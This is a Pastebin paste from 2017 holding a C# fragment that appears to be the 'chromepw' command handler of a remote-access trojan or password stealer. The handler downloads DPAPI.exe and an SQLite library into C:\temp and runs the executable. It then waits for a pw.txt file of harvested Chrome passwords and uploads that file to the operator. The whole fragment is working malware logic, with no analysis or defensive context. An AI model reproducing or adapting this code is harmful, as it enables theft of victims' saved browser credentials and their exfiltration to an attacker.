Advertisement
Guest User

Untitled

a guest
Mar 26th, 2017
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 0.86 KB | None | 0 0
  1. case "chromepw":
  2.                                 Directory.CreateDirectory("C:\temp");
  3.                                 bool exefile = DL("DPAPI.exe", @"C:\temp\DPAPI.exe");
  4.                                 bool dllfile = DL("System.Data.SQLite.DLL", @"C:\temp\System.Data.SQLite.DLL");
  5.                                 if(exefile && dllfile)
  6.                                 {
  7.                                     if(exec(@"C:\temp\DPAPI.exe"))
  8.                                     {
  9.                                         while(!File.Exists(@"C:\temp\pw.txt"))
  10.                                         {
  11.                                            
  12.                                         }
  13.                                         Upload(@"C:\temp\pw.txt");
  14.                                     }
  15.                                 }
  16.                                 break;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement